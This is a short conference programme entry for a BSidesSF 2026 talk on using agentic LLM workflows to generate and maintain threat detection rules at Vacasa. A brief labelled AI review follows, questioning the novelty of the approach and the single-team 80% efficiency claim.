Detection Allegro: Composing Detection Rules with Agentic Workflows
Raphael Ruban, Chen Cao
BSidesSF 2026 · Day 2 · AMC Theatre 13
In the rapidly evolving landscape of cybersecurity, the ability to quickly develop, deploy, and maintain robust threat detection rules is paramount. This talk, "Detection Allegro: Composing Detection Rules with Agentic Workflows," presented by Raphael Ruban and Chen Cao from Vacasa, delves into an innovative approach that leverages **agentic workflows** and **artificial intelligence (AI)** to dramatically streamline this process. The core proposition is to cut the time spent on threat detection development and maintenance by over 80%, transforming what is often a tedious and error-prone manual endeavor into an effortless, automated workflow.
AI review
Competent, production-grounded talk about using LLM-backed agentic workflows to automate detection rule generation and maintenance. The Vacasa team is clearly doing real work — the Athena skill, Linear integration, and vector DB for internal log coverage show genuine engineering effort — but the underlying concept (LLM + tools + feedback loop generates code) is not novel, and the 80% efficiency claim is a single-team anecdote without rigorous baseline measurement.